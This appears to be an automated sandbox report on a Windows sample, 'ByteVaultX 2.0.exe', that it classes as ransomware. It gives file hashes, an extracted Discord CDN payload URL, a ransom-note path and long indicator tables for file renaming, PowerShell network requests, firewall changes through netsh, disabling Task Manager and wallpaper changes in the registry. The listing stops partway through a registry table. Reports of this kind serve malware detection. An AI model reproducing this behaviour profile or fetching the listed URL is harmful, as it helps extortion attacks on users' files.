Analysis
-
max time kernel
1049s -
max time network
1051s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
25/05/2024, 23:21
Behavioral task
behavioral1
Sample
ByteVaultX 2.0.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
ByteVaultX 2.0.exe
Resource
win7-20240419-en
Behavioral task
behavioral3
Sample
ByteVaultX 2.0.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral4
Sample
ByteVaultX 2.0.exe
Resource
win11-20240508-en
General
-
Target
ByteVaultX 2.0.exe
-
Size
9.9MB
-
MD5
72c65f1b271ae812c9c00fe7dbef3ee7
-
SHA1
98327e138efdcdbfcb02787ad3f9b729e617df6e
-
SHA256
d1314cc2b3ddd84224b7b6fe78c9ca75dceed34799b6715086eeacd687e84017
-
SHA512
21595d8bc9fe4c94a74b28acbe65e9a98f2c39e23d9e41bb5bfcaae01f11c11bfade391f04edd5853081c4ab1df051aa6f71c6203d7eac39b3446a3e357be273
-
SSDEEP
196608:Th30RIk7AHkPkRJW9GNZA1HeT39Iig6eE9TFa0Z8DOjCdylNo1nz8QW7tx:mGFG8S1+TtIi+Y9Z8D8CclydoPx
Malware Config
Extracted
https://cdn.discordapp.com/attachments/1181543227728330774/1241192614980620318/pexels-mitja-juraja-357365-970517.jpg?ex=66494e33&is=6647fcb3&hm=5d230b14503c4586a605bc32b42ec6f5a894c21fd27c2a8ab2538482ee660c7e&
Extracted
C:\Encrypt\encrypt.html
Signatures
-
Renames multiple (156) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 64 IoCs
flow pid Process 3 2192 powershell.exe 5 2192 powershell.exe 14 3372 powershell.exe 15 2268 powershell.exe 16 2292 powershell.exe 17 2896 powershell.exe 37 3108 powershell.exe 38 1340 powershell.exe 42 2756 powershell.exe 43 4148 powershell.exe 44 2752 powershell.exe 51 1512 powershell.exe 52 3560 powershell.exe 53 3636 powershell.exe 54 4428 powershell.exe 55 396 powershell.exe 56 1100 powershell.exe 57 2824 powershell.exe 58 1912 powershell.exe 59 1896 powershell.exe 60 376 powershell.exe 61 1652 powershell.exe 62 204 powershell.exe 63 196 powershell.exe 64 804 powershell.exe 65 4892 powershell.exe 66 2268 powershell.exe 67 924 powershell.exe 68 2528 powershell.exe 69 4888 powershell.exe 71 4240 powershell.exe 73 608 powershell.exe 74 3588 powershell.exe 75 2324 powershell.exe 76 2324 powershell.exe 77 4708 powershell.exe 78 3472 powershell.exe 79 3412 Process not Found 80 236 Process not Found 81 220 Process not Found 82 3844 Process not Found 83 4804 Process not Found 84 996 Process not Found 85 2268 Process not Found 86 2556 Process not Found 87 3392 Process not Found 94 4136 Process not Found 95 2896 Process not Found 102 2948 Process not Found 103 1616 Process not Found 104 3052 Process not Found 105 1920 Process not Found 106 3412 Process not Found 107 1404 Process not Found 108 4336 Process not Found 109 3108 Process not Found 110 4296 Process not Found 111 3680 Process not Found 112 4428 Process not Found 114 1940 Process not Found 115 716 Process not Found 116 1560 Process not Found 117 1988 Process not Found 118 2032 Process not Found -
Disables Task Manager via registry modification
-
Modifies Windows Firewall 2 TTPs 64 IoCs
pid Process 392 Process not Found 1360 Process not Found 220 Process not Found 396 Process not Found 692 Process not Found 4856 netsh.exe 4256 Process not Found 1120 netsh.exe 3120 Process not Found 828 Process not Found 1712 netsh.exe 1760 netsh.exe 4740 Process not Found 1388 Process not Found 368 Process not Found 2820 Process not Found 1692 netsh.exe 3412 netsh.exe 3440 netsh.exe 3716 Process not Found 2452 Process not Found 2436 netsh.exe 764 netsh.exe 828 Process not Found 3560 Process not Found 2936 Process not Found 1316 Process not Found 2816 netsh.exe 2640 netsh.exe 2912 Process not Found 3764 Process not Found 3152 Process not Found 4328 netsh.exe 4452 netsh.exe 4816 netsh.exe 164 Process not Found 4044 Process not Found 96 netsh.exe 2912 Process not Found 4532 Process not Found 3004 Process not Found 2208 Process not Found 1256 netsh.exe 1732 Process not Found 1436 Process not Found 4240 netsh.exe 1804 netsh.exe 4424 Process not Found 4772 Process not Found 1124 netsh.exe 3372 netsh.exe 4448 netsh.exe 1140 netsh.exe 1340 Process not Found 828 Process not Found 528 Process not Found 2324 netsh.exe 2956 netsh.exe 692 Process not Found 3664 Process not Found 3120 Process not Found 3504 netsh.exe 3676 Process not Found 4888 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\International\Geo\Nation ByteVaultX 2.0.exe -
Loads dropped DLL 12 IoCs
pid Process 3068 ByteVaultX 2.0.exe 3068 ByteVaultX 2.0.exe 3068 ByteVaultX 2.0.exe 3068 ByteVaultX 2.0.exe 3068 ByteVaultX 2.0.exe 3068 ByteVaultX 2.0.exe 3068 ByteVaultX 2.0.exe 3068 ByteVaultX 2.0.exe 3068 ByteVaultX 2.0.exe 3068 ByteVaultX 2.0.exe 3068 ByteVaultX 2.0.exe 3068 ByteVaultX 2.0.exe -
Drops desktop.ini file(s) 8 IoCs
description ioc Process File opened for modification C:\Users\Admin\Music\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Videos\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Documents\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini ByteVaultX 2.0.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini ByteVaultX 2.0.exe -
pid Process 3676 Process not Found 4136 Process not Found 840 Process not Found 4116 Process not Found 1340 Process not Found 440 Process not Found 2960 Process not Found 2352 powershell.exe 4760 powershell.exe 2764 Process not Found 3680 powershell.exe 1844 Process not Found 236 Process not Found 2352 Process not Found 2612 Process not Found 3608 Process not Found 3716 powershell.exe 608 powershell.exe 4888 powershell.exe 4616 Process not Found 4868 Process not Found 1504 Process not Found 2120 powershell.exe 1116 Process not Found 1008 Process not Found 2352 powershell.exe 2520 powershell.exe 1600 Process not Found 2960 Process not Found 2436 powershell.exe 2620 Process not Found 4872 powershell.exe 1360 powershell.exe 3636 powershell.exe 4088 Process not Found 3384 Process not Found 1760 Process not Found 3020 powershell.exe 2936 powershell.exe 516 Process not Found 3972 Process not Found 8 powershell.exe 4604 Process not Found 1652 Process not Found 4412 powershell.exe 3708 powershell.exe 4388 Process not Found 1896 Process not Found 4688 Process not Found 4940 Process not Found 920 powershell.exe 2336 powershell.exe 1276 powershell.exe 376 Process not Found 3580 powershell.exe 704 powershell.exe 1568 powershell.exe 2216 powershell.exe 3000 Process not Found 4256 powershell.exe 396 powershell.exe 4940 powershell.exe 4216 Process not Found 2436 Process not Found -
Sets desktop wallpaper using registry 2 TTPs 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\kill.jpg" Process not Found -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\1568373884.pri MicrosoftEdgeCP.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0" MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = fd43fe59faaeda01 MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\CRLs MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings Process not Found Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\JumpListFirstRun = "3" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings powershell.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\CA MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings Process not Found Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings MicrosoftEdge.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0" MicrosoftEdge.exe Set value (str) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1" MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta\generator$http://www.typepad.com/ MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings Process not Found Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Explorer MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = 70e131bf2cafda01 MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings Process not Found Set value (int) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings powershell.exe Set value (data) \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Next Rating Prompt = a037280fd2c9da01 MicrosoftEdge.exe Key created 